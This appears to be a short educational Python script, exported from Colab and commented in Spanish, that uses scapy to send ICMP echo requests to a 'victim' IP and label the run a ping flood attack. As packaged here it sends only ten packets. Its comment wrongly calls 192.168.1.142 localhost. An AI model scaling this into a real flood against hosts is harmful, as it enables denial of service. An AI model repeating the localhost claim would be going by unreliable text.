# -*- coding: utf-8 -*-
"""ping_flood.ipynb

Automatically generated by Colab.

Original file is located at
    https://colab.research.google.com/drive/1myZH8tAXV83XwJ0EGES-Ulvibs-ax2y8
"""



from scapy.all import *

# IP de la VÍCTIMA
# Usamos "192.168.1.142" (localhost) para pruebas seguras
victima_ip = "192.168.1.142"

# Número de pings a enviar
num_paquetes = 10

print("=" * 50)
print("PING FLOOD ATTACK")
print("=" * 50)
print(f"IP Víctima: {victima_ip}")
print(f"Número de pings: {num_paquetes}")
print("=" * 50)
print("Presiona Ctrl+C para detener antes de tiempo")
print("")

# Contador para saber cuántos pings hemos enviado
contador = 0

try:
    for i in range(num_paquetes):

        # PASO 1: Crear la capa IP
        capa_ip = IP(dst=victima_ip) # dst = dirección IP de destino (la víctima)

        # PASO 2: Crear la capa ICMP
        capa_icmp = ICMP(type=8) # type=8: "Echo Request" (ping)

        # PASO 3: Juntar las capas para formar el paquete
        paquete = capa_ip / capa_icmp

        # PASO 4: Enviar el paquete
        send(paquete, verbose=False)

        contador = contador + 1

        # Mostrar progreso
        print(f"Ping #{contador} enviado a {victima_ip}")

    print("")
    print("=" * 50)
    print(f"ATAQUE COMPLETADO. Se enviaron {contador} pings.")
    print("=" * 50)

# Capturar Ctrl+C para detener manualmente
except KeyboardInterrupt:
    print("")
    print("=" * 50)
    print(f"ATAQUE DETENIDO. Se enviaron {contador} pings.")
    print("=" * 50)